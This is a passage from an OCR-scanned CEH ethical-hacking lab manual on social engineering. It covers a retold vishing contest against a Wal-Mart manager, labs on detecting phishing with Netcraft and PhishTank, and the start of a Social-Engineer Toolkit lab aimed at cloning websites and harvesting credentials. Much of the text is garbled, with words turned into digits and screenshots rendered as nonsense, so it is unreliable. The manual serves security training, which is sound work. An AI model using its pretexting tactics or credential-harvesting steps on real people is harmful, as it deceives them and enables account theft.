CEH Lab Manual

Social Engineering
Module 09
 Module 09 - Social Engineering

Social Engineering
Social engineering is the art of convincingpeople to reveal confidential infonmtion.

I CON KEY Lab Scenario

/ Valuable Source: http:/ / m onev.cnn.com /2012 /0 8 /O‫־־‬/technology/walm art-hack-
information
de Icon/index.litni
^ Test your
Social engineering is essentially the art o f gaining access to buildings, systems,
01‫־‬ data by exploiting human psychology, rather than by breaking 111 01‫ ־‬using
*5 Web exercise technical hacking techniques. The term “social engineering” can also mean an
£ Q Workbook revie attem pt to gain access to information, primarily through misrepresentation, and
often relies 011 the trusting nature o f m ost individuals. For example, instead o f
trying to find software vulnerability, a social engineer might call an employee
and pose as an IT support person, trying to tiick the employee into divulging
111s password.

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee

into giving 111111 inform ation that could be used 111 a hacker attack to win a
coveted “black badge” 111 the “social engineering” contest at the D eleon
hackers’ conference 111 Las Vegas.
111 tins year's Capture the Flag social engineering contest at D eleon, champion
Shane MacDougall used lying, a lucrative (albeit bogus) government contract,
and 111s talent for self-effacing small talk to squeeze the following inform ation
out o f Wal-Mart:
■ The small-town Canadian Wal-Mart store's janitorial contractor
■ Its cafeteria food-seivices provider
■ Its employee pay cycle
■ Its staff sliilt schedule
■ The time managers take then‫ ־‬breaks
■ W here they usually go for lunch
■ Type o f PC used by the manager
■ Make and version numbers o f the computer's operating system, and
■ Its web browser and antivirus software
Stacy Cowley at CNNM oney wrote up the details o f how Wal-Mart got taken 111
to the extent o f coughing up so m uch scam-worthy treasure.
Calling from 111s sound-proofed booth at D eleon MacDougall placed an
“urgent” call, broadcast to the entire D eleon audience, to a Wal-Mart store
manager 111 Canada, introducing liiinsell as "G an‫ ־‬Darnell" from Wal-Mart's
hom e oflice 111 Bentonville, Ark.

C E H L ab M an u al Page 675 E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

The role-playing visher (visliing being phone-based phishing) told the manager
that Wal-Mart was looking at the possibility o f winning a multimillion-dollar
government contract.
“Darnell'’ said that 111s job was to visit a few Wal-Mart stores that had been
chosen as potential pilot locations.
But first, he told the store manager, he needed a thorough picture o f how the
store operated.
111 the conversation, which lasted about 10 minutes, “Darnell” described
himself as a newly lured manager o f government logistics.
He also spoke offhand about the contract: “All I know is Wal-Mart can make a
ton o f cash o ff it,” he said, then went on to talk about his upcom ing visit,
keeping up a “ steady patter” about the project and life 111 Bentonville, Crowley
writes.
As if tins wasn't bad enough, M acDougall/Darnell directed the manager to an
external site to fill out a survey 111 preparation for 111s upcom ing visit.
The compliant manager obliged, plugging the address into 111s browser.
W hen his com puter blocked the connection, MacDougall didn't miss a beat,
telling the manager that he'd call the IT departm ent and get the site unlocked.
After ending the call, stepping out o f the booth and accepting 111s well-earned
applause, MacDougall became the first Capture the Flag champion to capture
even‫ ״‬data point, or flag, on the competition checklist 111 the three years it has
been held at Defcon. D efcon gives contestants two weeks to research their
targets. Touchy inform ation such as social security numbers and credit card
num bers are verboten, given that D efcon has no great desire to bring the law
down on its head.
D efcon also keeps its nose clean by abstaining from recording the calls, which
is against Nevada law. However, there's no law against broadcasting calls live to
an audience, which makes it legal for the D efcon audience to have listened as
]MacDougall pulled down Wal-Mart's pants.
MacDougall said, “Companies are way more aware about their security. They’ve
got firewalls, intrusion detection, log-in systems going into place, so it’s a lot
harder for a hacker to break 111 these days, or to at least break in undetected. So
a bunch o f hackers now are going to the weakest link, and the link that
companies just aren’t protecting, which is the people.”\
MacDougall also shared few best practices to be followed to avoid falling victim
to a social engineer:
■ Never be afraid to say no. If something feels wrong, something is
wrong
■ A 11 IT departm ent should never be calling asking about operating
systems, machines, passwords or email systems— they already know

C E H L ab M an u al Page 676 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

■ Set up an internal company security word o f the day and don’t give any
information to anyone who doesn’t know it
■ Keep tabs 011 w hat’s 011 the web. Companies inadvertently release tons
o f inform ation online, including through employees’ social media sites
As an expert eth ical hacker and penetration tester, you should circulate the
best practices to be followed among the employees.

& T o o ls Lab Objectives

dem onstrated in The objective o f this lab is to:
this lab are
available in ■ D etect phishing sites
D:\CEH-
■ Protect the network from phishing attacks
Tools\CEHv8
Module 09 Social To earn* out tins lab, you need:
Engineering
■ A computer mmnng Window Seiver 2012
■ A web browser with Internet access

Lab Duration
Time: 20 Minutes

» TASK 1
Overview Social Engineering
Overview Social engineering is die art of convincing people to reveal confidential information.
Social engineers depend 011 the fact that people are aware of certain valuable
information and are careless 111 protecting it.

Lab Tasks
Recommended labs to assist you 111 social engineering:
■ Social engineering
■ Detecting plushing using Netcraft
■ Detecting phishing using PliishTank

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion 011
your target’s security posture and exposure.

P L E A S E TALK T O Y OU R I N S T R U C T O R IF YOU HAV E Q U E S T I O N S

R E L A T E D T O T H I S L AB .

C E H L ab M an u al Page 677 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

Delecting Phishing Using Netcraft

Netrmftprovides n‫׳‬eb server and n‫׳‬eb hosting warket-share analysis, including n'eb
server and operating system detection.

I CON KEY Lab Scenario

Valuable / By now you are familiar with how social engineering is perform ed and what sort
information
ot inform ation can be gathered by a social engineer.
.‫״*־‬v Test your
Phishing is an example o f a social engineering technique used to deceive users,
and it exploits the poor usability o f current web security technologies.
*a Web exercise
Phishing is the act o f attempting to acquire information such as user names,
ffi! Workbook revi! passwords, and credit card details (and sometimes, indirectly, money) by
masquerading as a trustworthy entity in an electronic communication.
Communications claiming to be from popular social websites, auction sites,
online payment processors, 01‫ ־‬IT administrators are commonly used to lure the
unsuspecting public. Phishing emails may contain links to websites that are
infected with malware. Phishing is typically carried out by email spoofing 01‫־‬
instant messaging and it often directs users to enter details at a fake website
whose look and feel is almost identical to the legitimate one.
Phishers are targeting the customers o f banks and online payment services.
They send messages to the bank customers by manipulating URLs and website
forger\T. The messages sent claim to be from a bank and they look legitimate;
users, not realizing that it is a fake website, provide their personal information
and bank details. N o t all phishing attacks require a fake website; messages that
claim to be from a bank tell users to dial a phone num ber regarding problems
with their bank accounts. Once the phone num ber (owned by the plusher, and
provided by a Voice over IP service) is dialed, it prom pts users to enter their
account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-
ID data to give the appearance that calls come from a trusted organization.
Since you are an expert eth ical hacker and penetration tester, you m ust be
aware o f phishing attacks occurring 011 the network and implement anti-
phishing measures. 111 an organization, proper training must be provided to
people to deal with phishing attacks. 111 this lab you will be learning to detect
phishing using Netcraft.

C E H L ab M an u al Page 678 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

Lab Objectives
T in s k b w ill sh o w y o u p h ish in g sites u sin g a w e b b ro w s e r a n d sh o w y o u h o w to
use th e m . I t w ill te a c h y o u h o w to:

■ D e te c t p h ish in g sites

■ P ro te c t th e n e tw o rk fro m p h ish in g attack

^ ~ T o o ls T o carry o u t tins lab y o u need:

dem onstrated in ■ N etcraft is lo c a te d at D:\CEH-Tools\CEHv8 Module 09 Social
this lab are
Engineering\Anti-Phishing Toolbar\Netcraft Toolbar
available in
D:\CEH- ■ Y o u can also d o w n lo a d th e la test v e rsio n o f Netcraft Toolbar fro m th e
Tools\CEHv8 link h t t p : / /to o lb a r .n e tc r a lt.c o m /
Module 09 Social
■ I f y o u d ecid e to d o w n lo a d th e la te st version, th e n sc re e n sh o ts sh o w n
Engineering
111 th e lab m ig h t d iffer

■ A c o m p u te r ru n n in g W in d o w s S erv er 2012

■ A w e b b ro w se r (F irefox, I n te r n e t ex p lo rer, etc.) w ith In te rn e t access

■ A d m in istra tiv e privileges to r u n th e N e tc r a lt to o lb a r

Lab Duration
Tim e: 10 M inutes

Overview of N etcraft Toolbar

N etc raft T o o lb a r provides Internet security services, including anti-fraud an d
anti-phishing services, application testing, code reviews, au to m ated p en etratio n
testing, and research data and analysis o n m an y aspects o f the Internet.

Lab Tasks
^ T A S K 1
1. T o sta rt th is lab, y o u n e e d to la u n c h a w eb b ro w s e r first. 111 this lab w e
Anti-Phishing Tool hav e u se d Mozilla Firefox.
bar
2. L a u n c h th e Start m e n u by h o v e rin g th e m o u se c u rso r o n th e lo w er-left
c o rn e r o f th e d esk to p .

C E H L ab M an u al Page 679 E th ical H a ck in g a nd C ountem ieasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

JL
‫״‬5

Q = J Y o u cau also

download the Netcraft

toolbar form
h ttp ://toolbar.netcraft.com

* | Windows Server 2012

Wiwfciwo “erfci2012 IUIc.m C1n4llMI( Dot*c«nV
tiftlaatoncopv BmO MW

FIGU RE 1.1: Windows Server 2012-Start Menu

3. Click th e Mozilla Firefox ap p to la u n c h th e b ro w ser.

FIGU RE 1.2: Windows Server 2012-Start Menu Apps view

4. T o d o w n lo a d th e Netcraft Toolbar fo r Mozilla Firefox, e n te r

h t t p : / / to o lb a r.n e tc ra ft.c o m in th e ad d re ss b a r o f th e b ro w s e r o r d rag
a n d d ro p th e netcraft_toolbar-1.7-fx.xpi file in F irefo x .

5. 111 tins lab, w e are d o w n lo a d in g th e to o lb a r Iro m th e In te rn e t.

6. 111 F ire fo x b ro w ser, click Download th e N etcraft Toolbar to install as

th e ad d -o n .
N etcraft provides ^ ‫ןזח‬
Internet security services,
including anti-fraud and ‫ת‬ etc M i ft SINGLEH3 P ■‫ ן‬n , ,
anti-phishing services.

M»tc‫׳‬-»ft Toolbar

‫• ■׳‬

Why u tt tn• Noicratt Toolbar?

U Protect your tavinQf Irom I'hMhtnq attack*,

a s«« the hoittnq totat)or1and Ukfc Matatq 01«‫י‬
O I1*lp defend 11*0 Internet community trooi tra

FIGURE 1.3: Netcraft toolbar downloading Page

C E H L ab M anual Page 680 E th ical H a ck in g a nd C o untenneasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

7. O n th e Install pag e o f th e N e tc ra ft T o o lb a r site, click th e Firefox

im age to c o n tin u e w ith in stallatio n .
fc 4 c P ftO l

1
nETCI^AFT

‫ ־ » ״‬,.(■. D o w n lo a d N ow

Netcraft Anti Phithing Toolbar

&
CQQ1 Netcraft is an
Internet services company System Raqiilramania

based in Bath, England.

FIGU RE 1.4: N etcraft toolbar Installation Page

8. Click Allow to d o w n lo a d N e tc ra ft T o o lb a r.

^ ‫«סי»*ז‬ 10c*«.ne<r<ft<0»)lo*n
at ■
SNGLEH2r
1 -‫־‬- ■1

Hctcraft Teotbir D o w n lo a d N ow

N*te«H Antl-PN«hl0<‫ ׳‬Todhtr

r=rs a Systam Kaquirtrranti

'oolba• <uppor‫׳‬ >r>a*pl«tfc#rre (AMnn/HMnji)

« cwitnnrva>« .*‫׳‬sicns orthe too&ar 1«r or«e roujrg ««> « tu w « oo«‫׳‬a. and Mian
Help & Support
roMom• inat«llinQ?fm • ••id at#1..I.II.1.‫«״־‬mU.
« also ha»» a 8»t«t1«n 0»tutofwis <youWirt to g«t t*e m«t oa tf » • 1wanrt toofcae

FIGU RE 1.5: Netcraft toolbar Installation-Allow button

9. W h e n th e Softw are Installation d ialo g b o x ap p ears, click Install Now.

Software Installation

Install add-ons only from authors whom you trust.

Malicious software can damage your computer or violate your privacy.

You have asked to install the following item:

Netcraft Anti-Phishing Toolbar (Netcraft Ltd)

£ Q Netcraft Toolbar http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi
provides a wealth o f
information about the sites
you visit.

Install N o w Cancel

FIGU RE 1.6: Installing Netcraft Toolbar

10. T o c o m p le te th e in stallatio n it w ill ask y o u to re sta rt th e b ro w ser. C lick

Restart Now.

C E H L ab M anual P ag e 681 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

l.__ Risk Rating displays die

trustworthiness o f die current

■ A• <o not afrcnttf K

Help & Support
• l*1gUHnImlnilMiuf 1‫׳‬lr«m*■■•I UJ4InilaMu• *Mr
‫ י‬Ao jlec h1v« jMlaclKMx/ iito ijit tf you • i t «0 with* non <ut019‫ •י‬M M toabJt
• o«t 1Oimmh'it >n<vM «n1w4r«dn air MtUhMOir (juMOtm

FIGU RE 1.7: Restarting Firefox browser

11. N etcraft Toolbar is n o w visible. O n c e th e Toolbar is in stalled , it lo o k s

sim ilar to th e fo llo w in g figure.

p * ‫ם‬-
\U---- >«rw •t font Hill• 1 J
FIGU RE 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. W h e n y o u visit a site, th e fo llo w in g in fo rm a tio n displays 111 th e T o o lb a r

(unless th e pag e h as b e e n b lo ck ed ): Risk rating, Rank, a n d Flag.

13. Click S ite Report to sh o w th e r e p o rt o f th e site.

0=5!Site report links to :

detailed report for die

FIGU RE 1.9: Report generated by N etcraft Toolbar

14. I f y o u a tte m p t to visit a p ag e th a t h as b e e n id e n tified as a p liish in g page

by N e tc ra ft T o o lb a r y o u w ill see a warning dialog th a t lo o k s sim ilar to
th e o n e in th e fo llo w in g figure.

15. T ype, as an exam ple:

h ttp : / / w w w .pavpal.ca.6551 .secu re7 c.m x / im ages / cgi.bin

C E H L ab M anual Page 682 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

£ 0 . Phishing a site feeds

0011011x1011517updated
encrypted database of
patterns diat match phishing
URLs reported by the
Netcraft Toolbar.
FIGU RE 1.10: Warning dialog for blocked site
16. I f y o u tru st th a t p ag e click Y es to o p e n it a n d i f y o u d o n ’t, click No
(R ecom m ended) to b lo c k th a t page.
17. I f y o u click No th e fo llo w in g p ag e w ill be displayed.

c Coofb fi ft C-

.!■!•!!‫■!ר‬ PhKMng S*o Hlockcxl

%lll t‫»־־‬

.......- : m ; .

L ■
FIGURE 1.11: Web page blocked by Netcraft Toolbar

Lab Analysis
D o c u m e n t all die results an d rep o rt g athered d uring die lab.

T o o l/U tility I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d

N e tc r a f t ■ P h ish in g site d e te c te d

P LEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S

RE L A T E D TO T H I S LAB.

Questions
1. E v alu ate w h e th e r th e N e tc ra ft T o o lb a r w o rk s i f y o u use a tra n sp a re n t
proxy.

C E H L ab M anual Page 683 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

2. D e te rm in e it y o u can m ake th e N e tc ra ft T o o lb a r co e x ist o n th e sam e

line as o th e r to o lb a rs. I f so, h o w ?

3. H o w ca n y o u sto p th e T o o lb a r w a rn in g if a site is tru ste d ?

I n t e r n e t C o n n e c t io n R e q u ir e d

□ N<

P la tf o r m S u p p o r te d

0 C la s s r o o m □ !Labs

C E H L ab M an u al Page 684 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

Detecting Phishing Using

3
PhishTank
PhishTank is a collaborative clearinghousefor data and information regarding
phishing on the Internet.
I C O N K E Y
Lab Scenario
Valuable
____information P h ish in g is an a tte m p t b y an in d iv id u al 01‫ ־‬g ro u p to solicit p e rso n a l in fo rm a tio n
fro m u n su sp e c tin g u sers by em p lo y in g social en g in eerin g te ch n iq u es. P h ish in g
.‫ *>־‬Test your em ails are cra fte d to a p p e a r as if th ey h av e b ee n se n t fro m a legitim ate
o rg an iz atio n 01‫ ־‬k n o w n individual. T h e se em ails o fte n a tte m p t to en tice u sers to
gfe Web exercise click 011 a link th a t will take th e u se r to a fra u d u le n t w eb site th a t ap p ears
legitim ate. H ie u se r th e n m ay b e ask ed to p ro v id e p e rso n a l in fo rm a tio n su c h as
Workbook r‫׳‬e‫\־‬
a c c o u n t u se r n am es a n d p a ssw o rd s th a t can fu rth e r ex p o se th e m to fu tu re
co m p ro m ises. A dditio n ally , th e se fra u d u le n t w eb sites m ay c o n ta in m alicious
code.

W ith th e tre m e n d o u s in c re ase 111 th e u se o f o n lin e b an k in g , o n lin e share trad in g ,

a n d e c o m m e rc e, th e re h as b e e n a c o rre sp o n d in g g ro w th 111 th e in c id en ts o f
p h ish in g b ein g u se d to carry o u t financial trau d s. P h isliin g in v o lv es fra u d u len tly
acq u irin g sensitive in fo rm a tio n (e.g. p assw o rd s, cre d it c a rd details etc.) b y
m a sq u erad in g as a m asted entity.

111 th e p rev io u s lab y o u h av e already seen h o w a p h ish in g site can b e d e te c te d

u sin g th e N e tc ra ft tool.

T h e u sual scen ario is th a t th e v ic tim receives an em ail th a t ap p e ars to h av e b ee n

se n t fro m 111s bank. T h e em ail u rg es th e v ictim to click 011 th e lin k 111 th e em ail.
W h e n th e v ic tim d o es so, h e is ta k en to “ a secu re p ag e 011 th e b a n k ’s w e b site .”
T h e v ic tim believes th e w e b pag e to b e a u th en tic a n d h e e n te rs 111s u se r n am e,
p a ssw o rd , a n d o th e r in fo rm a tio n . 111 reality, th e w e b site is a fake a n d th e
v ic tim ’s in fo rm a tio n is sto len a n d m isused.

B eing an ad m in istra to r 01‫ ־‬p e n e tra tio n tester, y o u m ig h t im p le m e n t all th e m o st

so p h istica te d a n d ex p en siv e te c h n o lo g y so lu tio n s 111 th e w o rld ; all o l it can be
byp assed i f y o u r em p lo y ees fall fo r sim ple social en g in ee rin g scam s. I t b ec o m e

C E H L ab M an u al Page 685 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

y o u r resp o n sib ility to e d u c ate em p lo y ees 011 b e st p ractices fo r p ro te c tin g

in fo rm a tio n .

P h ish in g sites 01‫ ־‬em ails can b e re p o rte d to p lu sl 11n g -re p o rt@ u s-c e rt.g o v

h ttp : / / w w w .u s-c e rt.g o v / 11a v /r e p o r t p h 1sh 111g .h tm l

U S -C E R T (U n ited S tates C o m p u te r E m e rg e n c y R ead in ess T eam ) is co llectin g

p h ish in g em ail m essages a n d w eb site lo c atio n s so th a t th e y can h elp p eo p le
av o id b e c o m in g v ic tim s o f p h ish in g scam s.

[CTTools
dem onstrated in Lab Objectives
this lab are T h is lab w ill sh o w y o u h o w to use p h ish in g sites u sin g a w e b b ro w ser. I t w ill
available in teach y o u h o w to:
D:\CEH-
Tools\CEHv8 ■ D e te c t p h ish in g sites
Module 09 Social
■ P ro te c t th e n e tw o rk fro m p h ish in g attacks
Engineering

Lab Environment
T o carry o u t th e lab y o u need:

■ A c o m p u te r ru n n in g W in d o w s S erver 2012

■ A w eb b ro w se r (F irefox, In te rn e t E x p lo re r, etc.) w ith In te rn e t access

Lab Duration
T une: 10 M inutes

Overview of PhiskTank
£ Q PhishTank URL: P h ish T an k is a free community site w h ere anyone can subm it, verify, track, and
h ttp .//www.phishtank.com s!1are phishing data. P h ish T an k is a collaborative clearing h o u se for data and
inform ation regarding phish in g 011 the Internet. A lso, P h ish T an k provides an open
API to r developers an d researchers to integrate anti-phishing data into their
applications at 110 charge.

Lab Tasks
m. T A S K 1
1. T o sta rt th is lab y o u n e e d to la u n ch a w eb b ro w se r first. 111 th is lab w e
hav e u se d Mozilla Firefox.
PhishTank
2. L a u n c h th e Start m e n u b y h o v e rin g th e m o u se c u rso r 011 th e lo w er-left
c o rn e r o f d esk to p .

C E H L ab M an u al Page 686 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

jw

23 Windows Server 2012

Wndowa icrrct 2012 IUIe.m C«>vl!uatr D*t*cn»
b<alMlon copy Hu!a MW‫׳‬

- g • *fa
FIGU RE 2.1: Windows Server 2012-Start Menu

3. Click th e Mozilla Firefox ap p to la u n c h th e b ro w ser.

£ 0 1 PlushTank provides an
open API for developers and
researchers to integrate anti-
phishing data into dieir
applications at no charge.

FIGU RE 2.2: Windows Server 2012-Start Menu Apps view

4. T y p e http://w w w.phishtank.com in th e ad d ress b a r o f th e w e b b ro w s e r

a n d p ress Enter.

5. Y o u w ill see th e follow/ing

PhishTank ‫־‬.,‫״‬.‫י‬.,

J o in t i e fiy lita y a iittt p liia liiiK j

Sdbmrtstsopdfdohshes Track the Uatis of /a ir suhmfyaons
Verfy <A\cr jsen' submaaton. Develop software with our free API.

Recert Subrissbrs

1S7:£S1 rtnJ «r»n rmjmagei/<atvj

^*®:/VrstM.axVsy

lgliia rtc usemncs.aebfu.ictscmnsraurAxroim

m.cvn’PM/iMlct.Kni

FIGU RE 2.3: Welcome screen o f PhishTank

C E H L ab M anual Page 687 E th ical H a ck in g a nd C ountem ieasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

6. T y p e th e w e b site URL to b e c h e ck e d fo r p h ish in g , fo r ex am p le,

PliishTauk 1s operated
h ttp : / / s d a p ld 2 1 .h o s t2 1.c o m .
by O pen D N S to improve
the Internet through safer, 7. C lick Is it a phish?.
faster, and smarter DNS.

Join the fight against phishing

Submrt tu w c » d pheftea. ‫־‬Rack the ttatic of 1/cur submissions
Verfyongf jserV suonssons Develop software wtthourftee API.

j ntp //Kijptav. itMtucem

R#c*r» SubriKtors *MhTinkprovttet »‫ ׳‬oh‫ ״‬An tar

■dim)feat)lu>miftHim »u»p«>-le0pirn

'wcpcfcetMlr-drccint‫יי״׳‬Tfl-34CTdY..

FIGU RE 2.4: Checking for site

I f th e site is a phishing site , y o u see th e fo llo w in g w a rn in g d ialo g b ox.

PhishTank Ok of it* NM.i«o*MTw*

Submission #1571567 is aimentty ONLINE

02 O pen D N S is
interested in having die S01 n or Hcgcto‫ ׳‬to vert, t !6 sutxnsstor.
best available information
about phishing websites.
No screenshot yet
We have net yet successfully taken
a screeasltol •f the submitted website.

FIGURE 2.5: W arning dialog for phishing site

Lab Analysis
D o c u m e n t all die w ebsites an d verify w h eth e r diey are ph ish in g sites.

T o o l/U tility I n f o r m a tio n C o l l e c t e d / O b j e c t i v e s A c h ie v e d

P h is k T a n k ■ P h ish in g site d e te c te d

C E H L ab M anual Page 688 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

PLEASE TALK TO YOUR I N S T R U C T O R IF YOU HAVE Q U E S T I O N S

RE L A T E D TO T H I S LAB.

Questions
1. E v alu ate w h a t P liisliT an k w a n ts to h e a r a b o u t spam .

2. D o e s P liisliT an k p r o te c t y o u fro m p h ish in g ?

3. W h y is O p e n D N S b lo ck in g a p lu sh site th a t P liisliT an k d o e s n 't list o r

has n o t v et v e n tie d ?

I n t e r n e t C o n n e c t io n R e q u ir e d

0 Y es □ No

P la tf o r m S u p p o r te d

0 C la s s r o o m □ !Labs

C E H L ab M an u al Page 689 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

Social Engineering Penetration

3
Testing using Social Engineering
Toolkit (SET)
The Socia/-Engineer Toolkit (SE T) is an open-source ‫־‬Python-driven tool aimed at
penetration testing around social engineering

■con key Lab Scenario

£_ Valuable Social en g in eerin g is an ev e r-g ro w in g th re a t to o rg an iz atio n s all o v er th e w o rld .
information
Social en g in ee rin g attack s are u se d to c o m p ro m ise c o m p a n ie s e v e n ‫ ־‬dav. E v e n
s Test your th o u g h th e re are m a n y h ac k in g to o ls available w ith u n d e rg ro u n d h ack in g
knowledge c o m m u n itie s, a social en g in eerin g to o lk it is a b o o n fo r attack ers as it is freely
Web exercise available to u se to p e rfo rm sp e ar-p liish in g attack s, w eb site attack s, etc.
A tta ck e rs ca n d ra ft em ail m essag es a n d a tta c h m alicio u s files an d se n d th e m to
m Workbook review a large n u m b e r o f p e o p le u sin g th e sp e a r-p h ish in g attac k m e th o d . A lso , th e
m u lti-atta ck m e th o d allow s u tiliza tio n o f th e Java ap p let, M e tasp lo it b ro w ser,
C red e n tia l H a r v e s te r / T a b n a b b in g , etc. all a t once.

T h o u g h n u m e ro u s so rts o l attack s can b e p e rfo rm e d u sin g tin s to o lk it, tins is

also a m u st-h a v e to o l fo r a p e n e tra tio n te ste r to ch e ck fo r v u lnerabilities. S E T is
th e sta n d a rd fo r social-en g in eerin g p e n e tra tio n tests a n d is su p p o rte d heavily
w ith in th e security co m m u n ity .

A s an eth ical hacker, p e n e tra tio n tester, o r security adm inistrator, y o u

sh o u ld b e extrem ely fam iliar w ith th e Social E n g n ie e rin g T o o lk it to p e rfo rm
v ario u s tests fo r vulnerab ilities 011 th e n etw o rk .

Lab Objectives
T h e o b jectiv e o f tins lab is to h elp stu d e n ts le arn to:

■ C lo n e a w eb site

■ O b ta in u se r n am es a n d p a ssw o rd s u sin g th e C red e n tia l H a rv e ste r

m e th o d

■ G e n e ra te re p o rts fo r c o n d u c te d p e n e tra tio n tests

C E H L ab M an u al Page 690 E th ical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]
 Module 09 - Social Engineering

& Tools Lab Environment

dem onstrated in T o earn ’ o u t die k b , y ou need:
this lab are
available in ■ R u n this tool 111 BackTrack V irtual M aclune
D:\CEH-
■ W eb b row ser w ith In te rn e t access
Tools\CEHv8
Module 09 Social ■ A dm inistrative privileges to m n tools
Engineering

Lab Duration
T une: 10 M inutes

Overview of Social Engineering Toolkit

Social-Enguieer T oolkit is an o p en -so u rce P y th o n -d riv en to o l aim ed at p en etratio n
testing aro u n d Social-Engineering. T lie (SET) is specifically designed to p erfo rm
advanced attacks against die h u m a n elem ent. T lie attacks built in to d ie toolkit are
designed to be targeted and focused attacks against a p erso n o r organization used
during a pen etratio n test.

Lab Tasks
1. L o g in to y o u r BackTrack v irtu a l m aclune.

T A S K 1 2. Select A pplications ‫ ^־־‬BackTrack ‫ ^־־‬Exploitation T ools ‫ ^־־‬Social

Execute Social Engineering T ools ‫ ^־־‬S ocial Engineering Toolkit a n d click Set.
Engineering ^ Applications[ Places System [>7] 3 Tue Sep 25. 7:10 PM

Toolkit |Q ^ Information Gathering

r■ vulnerability Assessment

J0 Exploitation Tools .-f * Network Exploitanor Tools

Privilege Escalation Web Exploitation Tools

E f Maintaining Access Database Exploitation Tools ^

I
Reverse Engineering

RFID100IS
Wireless Exploitation Tools

social E’ jifM 9 |
a 9 BEEF XSS Framework

O Physical Exploitation 9 MoneyPots

Forensics ‫י‬Open Source E x p lo ite d ,h set \ 3 11• Social Engineering Toolkit

KCporting Tools
c P services
y Miscellaneous ►

<< back track

FIGU RE 3.1: Launching SET in BackTrack

C E H L ab M anual P ag e 691 E tliical H a ck in g a nd C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.]

3.
f f i s E T has been
presented at large-scale
conferences including
Blackhat, DerbyCon,
D efcon, and ShmooCon.
£ Q t 11e web jacking attack
is performed by replacing
the victim’s browser with
another window that is
made to look and appear to
be a legitimate site.
4.
f f i s E T allows you to
specially craft email
messages and send them to
a large (or small) number of
people with attached file
format malicious payloads.
5.
C E H L ab M anual Page 692
Module 09 - Social Engineering
A Terminal w in d o w fo r S E T w ill ap p ear. T y p e y an d p ress Enter to
agree to th e term s o f service.
File Edit View Terminal Help
THIS SOFTWARE, EVEN IF ADVISED OF THE PO SSIBILITY OF SUCH DAMAGE.
The above lic e n s in g was taken from th e BSD lic e n s in g and ^is a p p lie d to S o c ia l-E n
g in e e r T o o lk it as w e l l . ___ " * ^ 1
Note t h a t th e S o c ia l-E n g in e e r T o o lk it i s p ro v id e d as i s , and i s 3 r o y a lt y f r e e 0
p en -so urce a p p lic a t io n . M r
F e e l f r e e to m o d ify , use, change, m arket, do w h atever § u want w ith i t a f lo n g a
s you g iv e th e a p p ro p r ia te c r e d i t where c r e d i t
i s due (which means g iv in g th e au th o rs th e c r e d i t th e y ife s e rv e f o r w r i t in g i t ) .
A lso n ote t h a t by using t h is s o ftw a re , i f you e v e r
see th e c r e a t o r o f SET in a b a r , you a re re q u ire d to g iv e him a hugand buy him
a b e e r. Hug must l a s t a t le a s t 5 seconds. Author
holds th e r ig ft t to refipse th e hug o r th e b e e r . ■ f | ‫ן‬ ^ \ \
1
T ^ ^ * c M - E t l^ e e r T A lk it W s r fT iig fliiJ p y e ly good pn<r f l o t 'B k i l . I f y o u \a re
if l a 4
op I ^ S a t h * t o o l f o f l rcaj f c j B u ^ p u r J ^ e t h a r ^ r c
1 \
n W c r a t h O T f t f l b ^ th e l:o m p a n y *y m j a r e ^ r e r f O T ll™ a ^ e s s « e r r ^ J ‫׳‬ou a re v i o l a t
in g th e term s o f s e r v i e and lic e n s e o f t h i s t o o l s e t . B^ , r t t i n q X
yes (o n ly one t im e ) , you ag ree to th e term s o f s e r v ic e a n d T n a t y o u w i l l o n ly us
e t h i s t o o l f o r la w f u l purposes o n ly .
FIGU RE 3.2: SET Service Agreement option
Y o u w ill b e p re s e n te d w ill a list o f m e n u s to select th e task. T y p e 1 an d
p ress Enter to select th e Social-Engineering A ttacks o p tio n .
File Edit View Terminal Help
Homepage: h ttp s ://w w w .tru s te d s e c .c o m [
Welcome to th e S o c ia l-E n g in e e r T o o lk i t (S E T J j.Y o u r one
stop shop f o r a l l o f your s o c ia l-e n g in e e r in g n e e d s .^ ,
